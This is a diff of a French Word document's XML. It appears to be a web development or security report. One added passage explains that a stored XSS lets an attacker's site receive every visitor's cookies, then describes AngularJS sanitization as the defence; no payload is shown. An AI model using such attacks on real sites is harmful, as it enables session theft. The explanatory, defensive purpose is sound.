+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:color w:val="000080"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Et lorsqu’un utilisateur accèdera à cette page tous les cookies de l’utilisateur seront envoyés vers le site de l’attaquant</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AngularJS propose par défaut des mécanismes de protection contre les failles XSS. Pour cela </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Angular</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> procède à la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Sanitization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  de toutes les variables ayant pour fonction de capturer </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">les entrées de l’utilisateur comme ici le champ description. Le principe de La </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Sanitization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>(désinfection) est d’encoder tout caractère Javascript ou HTML afin d’éviter leur exécution. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
@@ -3679,13 +4772,8 @@
       <w:pPr>
         <w:ind w:firstLine="283"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Postman</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 1</w:t>
+      <w:r>
+        <w:t>Postman 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3709,13 +4797,8 @@
       <w:pPr>
         <w:ind w:firstLine="283"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Postman</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2</w:t>
+      <w:r>
+        <w:t>Postman 2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3738,10 +4821,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:p>
-      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
@@ -3786,12 +4866,10 @@
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>implements</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> http basic </w:t>
       </w:r>
@@ -3846,14 +4924,7 @@
         <w:rPr>
           <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
         </w:rPr>
-        <w:t xml:space="preserve">//TO </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
-        </w:rPr>
-        <w:t>DO</w:t>
+        <w:t>//TO DO</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
@@ -3863,7 +4934,6 @@
         <w:t>Subsctract</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> of (veille)</w:t>
       </w:r>
@@ -3985,7 +5055,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="19853889"/>
     <w:multiLevelType w:val="multilevel"/>
@@ -6085,7 +7155,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -6101,7 +7171,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="374">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -6207,7 +7277,6 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -6253,11 +7322,9 @@
     <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -6476,6 +7543,8 @@
     <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -6696,6 +7765,35 @@
       <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
       <w:u w:val="single"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
+    <w:name w:val="paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00A74150"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
+    <w:name w:val="normaltextrun"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="00A74150"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
+    <w:name w:val="eop"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="00A74150"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="spellingerror">
+    <w:name w:val="spellingerror"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:rsid w:val="00A74150"/>
   </w:style>
 </w:styles>
 </file>
@@ -7000,7 +8098,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0037EDBA-3643-456E-A6D5-89E69C380B17}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{03D3CB8A-D66C-4163-B8FE-1B290E1E9808}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
